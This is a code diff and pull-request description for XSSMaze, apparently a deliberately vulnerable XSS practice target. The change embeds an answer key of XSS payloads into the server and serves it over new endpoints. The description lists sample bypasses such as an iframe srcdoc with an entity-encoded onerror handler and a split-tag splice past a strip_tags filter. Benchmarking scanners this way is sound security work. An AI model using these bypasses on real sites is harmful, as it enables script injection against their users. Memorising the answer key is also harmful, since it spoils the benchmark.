+      "js"             => Entry.new(Xssmaze::Assets::INDEX_JS, "application/javascript; charset=utf-8", 86400),
+      "favicon"        => Entry.new(Xssmaze::Assets::FAVICON_SVG, "image/svg+xml; charset=utf-8", 86400),
     }
   end
 end

--- a/src/server.cr
+++ b/src/server.cr
@@ -12,6 +12,7 @@ module Xssmaze::Server
     {path: "/", key: "index"},
     {path: "/map/text", key: "map_text"},
     {path: "/map/markdown", key: "map_md"},
+    {path: "/solutions.json", key: "solutions_json"},
     {path: "/map/categories", key: "categories"},
     {path: "/map/openapi", key: "openapi"},
     {path: "/sitemap.xml", key: "sitemap"},
@@ -77,6 +78,25 @@ module Xssmaze::Server
 
   FILTER_PARAMS = %w[type q vuln reach exploitable]
 
+  # Body for the dynamic /map/json path (any filter, or `with=solutions`).
+  # `with=solutions` folds the answer key into each surviving object; it reuses
+  # the same filtered indices, so it composes with every existing filter.
+  def self.filtered_map_json(env, mazes, maze_json_objs, with_solutions : Bool) : String
+    indices = filter_indices(mazes, env)
+    if with_solutions
+      entries = Xssmaze::Solutions.entries
+      folded = indices.map do |i|
+        sol = entries[mazes[i].name]?
+        leaf = sol ? {payload: sol.payload, context: sol.context} : nil
+        maze_json_objs[i].merge({solution: leaf})
+      end
+      {endpoints: folded, total: folded.size}.to_json
+    else
+      objs = indices.map { |i| maze_json_objs[i] }
+      {endpoints: objs, total: objs.size}.to_json
+    end
+  end
+
   def self.json_no_store(env)
     env.response.content_type = "application/json"
     env.response.headers["Access-Control-Allow-Origin"] = "*"
@@ -133,6 +153,7 @@ module Xssmaze::Server
 
     Xssmaze.freeze!
     catalog = Catalog.build_all
+    solution_pages = Catalog.build_solution_pages
     mazes = Xssmaze.get
     maze_json_objs = mazes.map(&.to_json_object)
 
@@ -167,9 +188,14 @@ module Xssmaze::Server
     end
 
     # Filter the pre-materialized JSON objects rather than rebuilding tuples.
+    # `with=solutions` folds the answer key into each object; it composes with
+    # the type/q/vuln/reach/exploitable filters and, like them, forces the
+    # dynamic path. The plain, unparameterised response stays the cached entry
+    # so it is byte-identical for existing consumers.
     map_json_entry = catalog["map_json"]
     get "/map/json" do |env|
-      if FILTER_PARAMS.none? { |p| env.params.query[p]? }
+      with_solutions = env.params.query["with"]? == "solutions"
+      if !with_solutions && FILTER_PARAMS.none? { |p| env.params.query[p]? }
         next Xssmaze::Server.serve(env, map_json_entry, last_modified)
       end
 
@@ -178,8 +204,21 @@ module Xssmaze::Server
       env.response.headers["Cache-Control"] = "public, max-age=60"
       env.response.headers["Vary"] = "Accept-Encoding"
 
-      filtered_objs = Xssmaze::Server.filter_indices(mazes, env).map { |i| maze_json_objs[i] }
-      {endpoints: filtered_objs, total: filtered_objs.size}.to_json
+      Xssmaze::Server.filtered_map_json(env, mazes, maze_json_objs, with_solutions)
+    end
+
+    # /solutions/<category> serves one category's answer-key markdown. Per
+    # category, so it is a dynamic route, but each body is a cached Catalog
+    # Entry (ETag / gzip / 304) like every other catalog view.
+    get "/solutions/:category" do |env|
+      category = env.params.url["category"]
+      if entry = solution_pages[category]?
+        Xssmaze::Server.serve(env, entry, last_modified)
+      else
+        env.response.status_code = 404
+        env.response.content_type = "text/html; charset=utf-8"
+        Catalog.render_404(env.request.path)
+      end
     end
 
     # Pick a random maze and 302 to it. Useful for lab demos and fuzzers

--- a/src/solutions.cr
+++ b/src/solutions.cr
@@ -1,0 +1,160 @@
+require "json"
+
+# Compile-time answer key. The `solutions/` tree carries a ground-truth payload
+# and injection context for every maze; embedding it here the way
+# `Xssmaze::VERSION` embeds shard.yml keeps the binary self-contained, so the
+# Docker image ships the answer key without shipping the directory. Parity with
+# the live catalog is enforced by `spec/solutions_spec.cr`, so the two can never
+# drift apart again.
+module Xssmaze::Solutions
+  # One ground-truth entry: how the maze is beaten and where the bytes land.
+  struct Solution
+    getter payload : String
+    getter context : String
+    getter url : String
+
+    def initialize(@payload : String, @context : String, @url : String)
+    end
+  end
+
+  # category (solution-file stem) -> raw markdown, read at compile time. A bare
+  # `{ {% for %} ... {% end %} }` can't be recognised as a Hash literal before
+  # the loop body expands, so the literal is emitted from a macro instead. `ls`
+  # runs on the build host, so `solutions/` must be present at compile time —
+  # see `.dockerignore`.
+  private macro embed_solutions
+    {
+      {% for path in `ls "#{__DIR__}/../solutions"`.strip.split('\n') %}
+        {% base = path.gsub(/\.md$/, "") %}
+        {% if path.ends_with?(".md") && base != "README" %}
+          {{ base }} => {{ read_file("#{__DIR__}/../solutions/#{path.id}") }},
+        {% end %}
+      {% end %}
+    }
+  end
+
+  # category -> markdown body (what `GET /solutions/<category>` serves).
+  MARKDOWN = embed_solutions
+
+  # maze name -> Solution, parsed once at boot from the embedded markdown.
+  ENTRIES = begin
+    parsed = {} of String => Solution
+    MARKDOWN.each_value { |md| parse_into(md, parsed) }
+    parsed
+  end
+
+  # Every category name that has a markdown page, sorted for stable output.
+  def self.categories : Array(String)
+    MARKDOWN.keys.sort!
+  end
+
+  # Raw markdown for one category, or nil if there is no such page.
+  def self.markdown(category : String) : String?
+    MARKDOWN[category]?
+  end
+
+  # maze name -> Solution.
+  def self.entries : Hash(String, Solution)
+    ENTRIES
+  end
+
+  # Every entry keyed by maze name, for `GET /solutions.json`. Keys are sorted
+  # so the body — and therefore its cached ETag — is stable across boots.
+  def self.json_body : String
+    JSON.build do |json|
+      json.object do
+        ENTRIES.keys.sort!.each do |name|
+          sol = ENTRIES[name]
+          json.field name do
+            json.object do
+              json.field "payload", sol.payload
+              json.field "context", sol.context
+              json.field "url", sol.url
+            end
+          end
+        end
+      end
+    end
+  end
+
+  # ----- markdown parsing -----
+  #
+  # An entry is a `### <maze-name>` heading followed (before the next heading)
+  # by a backtick URL line and `- payload:` / `- context:` bullets, exactly the
+  # shape `solutions/basic.md` documents. Header/POST-only entries carry the
+  # payload on a `- header:` / `- body:` line instead, so those stand in when no
+  # `- payload:` line is present.
+  private HEADING      = /\A###\s+(.+?)\s*\z/
+  private URL_LINE     = /\A`([^`]+)`/
+  private PAYLOAD_LINE = /\A-\s+payload\b[^:]*:\s*(.*)\z/
+  private ALT_LINE     = /\A-\s+(?:header|body)\b[^:]*:\s*(.*)\z/
+  private CONTEXT_LINE = /\A-\s+context\s*:\s*(.*)\z/
+
+  private def self.parse_into(md : String, into : Hash(String, Solution)) : Nil
+    name = nil.as(String?)
+    buf = [] of String
+
+    md.each_line do |raw|
+      line = raw.chomp
+      if m = line.match(HEADING)
+        if n = name
+          into[n] = parse_block(buf)
+        end
+        name = m[1]
+        buf = [] of String
+      elsif name
+        buf << line
+      end
+    end
+
+    if n = name
+      into[n] = parse_block(buf)
+    end
+  end
+
+  # Pull the URL, payload (or its header/body stand-in) and context out of one
+  # entry's body lines. First match of each field wins.
+  private def self.parse_block(lines : Array(String)) : Solution
+    url = ""
+    payload = ""
+    alt = ""
+    context = ""
+
+    lines.each do |line|
+      if url.empty? && (m = line.match(URL_LINE))
+        url = m[1]
+      elsif payload.empty? && (m = line.match(PAYLOAD_LINE))
+        payload = m[1]
+      elsif alt.empty? && (m = line.match(ALT_LINE))
+        alt = m[1]
+      elsif context.empty? && (m = line.match(CONTEXT_LINE))
+        context = m[1]
+      end
+    end
+
+    raw = payload.empty? ? alt : payload
+    Solution.new(unwrap(raw), context.strip, url.strip)
+  end
+
+  # Payload lines carry the value in a markdown inline-code span, sometimes with
+  # a trailing note; return the span's contents. Handles a multi-backtick fence
+  # (used when the payload itself contains a backtick, e.g. a template literal)
+  # and drops the single surrounding space a code span may carry.
+  private def self.unwrap(value : String) : String
+    value = value.strip
+    return value unless value.starts_with?('`')
+
+    ticks = 0
+    while ticks < value.size && value[ticks] == '`'
+      ticks += 1
+    end
+    fence = "`" * ticks
+    inner = value[ticks..]
+    if idx = inner.rindex(fence)
+      inner = inner[0, idx]
+    end
+    inner = inner[1..] if inner.starts_with?(' ')
+    inner = inner[0...-1] if inner.ends_with?(' ')
+    inner
+  end
+end


### PR DESCRIPTION
## What & why

`solutions/` held **1049 ground-truth entries** (payload + injection context per maze) that nothing at runtime referenced, and `.dockerignore` excluded the directory — so `docker run ghcr.io/hahwul/xssmaze:main` shipped **no answer key at all**. This embeds the answer key at compile time, serves it, and adds a spec that stops it drifting from the catalog again. XSSMaze goes from a target list to a benchmark that knows what a scanner *should* have found.

## Part 1 — fixed the drift

Derived against a live `/map/json` (1064 mazes), the parser treats every `### <name>` heading in a category file as an entry. Result: **27 missing, 11 orphans**. (The brief's ~35/~20 estimates were stale; header/POST entries that use a `- header:`/`- body:` line instead of `- payload:` are complete and were miscounted by a naive scan.)

- **27 missing entries written** — all 6 `headless-generator-*`, 8 `html5-sanitizer-*`, 8 `waf-facade-*`, 5 `xsleak-*`. **Every payload is verified against the running server** (the dangerous bytes survive that level's actual filter); the `xsleak` levels are XS-Leak oracles, documented as `non-xss-control` (correct scanner result = no XSS).
  - Notable techniques: `html5-sanitizer` uses `<iframe srcdoc="…on&#101;rror…">` (the srcdoc attribute value entity-decodes on re-parse, dodging the handler strip), plus a single-pass `strip_tags` splice (`<ifra<iframe>me …>`) and a JS template-literal `${alert(1)}`; `waf-facade` covers inspection-size caps, CRS anomaly scoring, header scope gaps, case-folding, JS-string context, and client-side WAF theatre.
- **`headless.md` rewritten** from prose into the per-level format (its `### Data Exfiltration`-style prose headings were the 10 orphans).
- **`filterchain-level5` merged** — deleted the duplicate `### filterchain-level5 (working)` heading; its URL had unencoded `;` which Kemal's query parser splits on, truncating the payload. Fixed to `%3B`.
- Added explicit `- payload:` lines to the 6 `apidom` entries (payload was only documented in the file intro).

Parity is now exact: **1064 live == 1064 entries, 0 missing, 0 orphans**.

## Part 2 — served it

- **`src/solutions.cr` (new)** — embeds every `solutions/*.md` at compile time (the `read_file` precedent from `src/registry.cr`), parsed once at boot into `maze name -> {payload, context, url}`. A `macro` emits the file→markdown hash literal because a bare `{ {% for %} … {% end %} }` can't be recognised as a Hash before the loop expands. Required from `src/catalog.cr` (not `src/xssmaze.cr`).
- **`GET /solutions/<category>`** → that category's markdown (`text/markdown`), a dynamic route whose body is a cached `Catalog::Entry` (same ETag / gzip / 304 as every other view).
- **`GET /solutions.json`** → every entry keyed by maze name; cached static route wired through `build_all` + `STATIC_ROUTES`.
- **`GET /map/json?with=solutions`** → folds `solution: {payload, context}` into each object. It reuses `filter_indices`, so it **composes with** `type`/`q`/`vuln`/`reach`/`exploitable`. **Default `/map/json` is byte-identical** (see below).
- New paths added to `Catalog::MAP_LINKS` (index footer): `/solutions.json`, `/solutions/basic`.

## Part 3 — locked it

- **`spec/solutions_spec.cr` (new)** — asserts parity **both directions** (every maze has an entry; every entry names a live maze) with failure messages that list the offending names, plus payload/context completeness and the JSON/markdown surface.
- **`.dockerignore`** no longer excludes `solutions/`, so the compile-time `read_file` finds it (`COPY . .` runs before `shards build`).

## Verification (real output)

```
$ crystal tool format --check   → clean
$ bin/ameba                     → 201 inspected, 0 failures
$ crystal spec
142 examples, 0 failures, 0 errors, 0 pending

$ curl -s /solutions/basic            → text/markdown, ETag, gzip; If-None-Match → 304
$ curl -s /solutions.json             → 1064 entries, keyed & sorted by maze name
   basic-level1: {"payload":"<script>alert(1)</script>","context":"raw reflection, no filter","url":"/basic/level1/?query=%3Cscript%3E…"}
$ curl -s "/map/json?with=solutions&type=basic"
   total: 7 | basic-level1 solution={"payload":"<script>alert(1)</script>","context":"raw reflection, no filter"}
```

**Plain `/map/json` unchanged — diffed against a fresh build of `main`:**

```
$ shasum -a256 mapjson_main.json mapjson_branch.json
3bf0f76b…f35f  mapjson_main.json
3bf0f76b…f35f  mapjson_branch.json
$ diff → IDENTICAL (both 324427 bytes)
```

**Docker build works with the answer key embedded:**

```
$ docker build -t xssmaze-solutions-test .     → success (exit 0)
# runtime image ships ONLY the binary, no solutions/ dir:
$ docker run --entrypoint sh … -c 'ls /xssmaze/solutions'  → No such file or directory
# yet the container serves it:
$ curl /solutions.json      → 1064 entries
$ curl /solutions/basic     → 200
$ curl "/map/json?with=solutions&type=basic" → total 7
```

## Reviewer notes

- **Per-row solution links on the index** were left out deliberately (the brief said to skip if more than small): it would mean threading a link through `build_maze_row` and touching the search/filter JS+CSS in `assets.cr`, which another agent owns. Discovery is instead via the footer links, `/solutions.json`, and `/map/json?with=solutions`.
- **Parser contract worth a look:** every `### ` heading in a *category* file must be a live maze name (that's what makes the parity spec bite). `solutions/README.md` is excluded from parsing; sub-sections in category files must therefore avoid `### ` headings.
- A few tagged-template payloads (e.g. `basic-level5`) keep their markdown backslash-escaping (`alert\`1\``) in `/solutions.json`'s `payload` field; the paste-able exploit lives in the `url` field, which is unaffected.
- Files touched are all within the assigned set: `src/solutions.cr` (new), `src/catalog.cr`, `src/server.cr`, `.dockerignore`, `solutions/**`, `spec/solutions_spec.cr` (new). No changes to `src/xssmaze.cr`, `src/registry.cr`, or `src/mazes/**`.
